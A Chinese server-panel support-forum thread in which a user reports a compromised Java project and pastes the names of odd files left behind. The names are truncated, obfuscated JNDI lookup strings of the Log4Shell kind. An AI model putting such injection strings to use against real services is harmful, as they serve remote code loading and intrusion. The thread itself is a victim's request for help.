宝塔618特惠活动,企业版999元/年,宝塔SSL证书买1送1!限时抢购!查看活动
当前位置:论坛首页 > Linux面板 > 求助

【待反馈】系统被攻陷宝塔独立项目多出奇怪文件

发表在 Linux面板2024-8-27 17:51 [复制链接] 9 1001

为了能快速了解并处理您的问题,请提供以下基础信息:
面板、插件版本:[size=1.2][url=]8.2.0[/url]

系统版本:centos

问题描述:java独立项目系统被攻陷,能越过登录操作api

相关截图(日志、错误):独立项目里面多出来了几个奇怪的文件
${:-y$}{${6pr:-j}nd${env:fm4:-}i:d${xyf::-n}s:
${url:UTF-8:http:
..'

使用道具 举报 只看该作者 回复
发表于 2024-8-27 17:54:58 | 显示全部楼层
使用道具 举报 回复 支持 反对
发表于 2024-8-27 17:55:53 | 显示全部楼层
https://i.afbcs.cn/Swjmt9
使用道具 举报 回复 支持 反对
发表于 2024-8-28 11:24:03 | 显示全部楼层

您好,无法查看您的图片,您说的应该是您的项目被攻击了吧
使用道具 举报 回复 支持 反对
发表于 2024-8-28 14:08:38 | 显示全部楼层
运维技术阿闯 发表于 2024-8-28 11:24
您好,无法查看您的图片,您说的应该是您的项目被攻击了吧

对的,就是被攻击了,最后排查就是独立项目里面多出来了这些文件
使用道具 举报 回复 支持 反对
发表于 2024-8-28 14:10:06 | 显示全部楼层
使用道具 举报 回复 支持 反对
发表于 2024-8-28 14:11:28 | 显示全部楼层
使用道具 举报 回复 支持 反对
发表于 2024-8-28 14:12:12 | 显示全部楼层
这个图片地址,正常传递怎么显示不出来。。。
https://ibb.co/L1cHsLW
使用道具 举报 回复 支持 反对
发表于 2024-8-28 14:13:00 | 显示全部楼层
我研究了半天没什么文献资料,只有说ssl证书漏洞的
使用道具 举报 回复 支持 反对
发表于 2024-8-28 15:33:00 | 显示全部楼层
宝塔用户_ixvyqq 发表于 2024-8-28 14:13
我研究了半天没什么文献资料,只有说ssl证书漏洞的

您好,具体情况需要排查的,类似您是否有开启安全防护呢,是否有安装安全类的插件呢
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表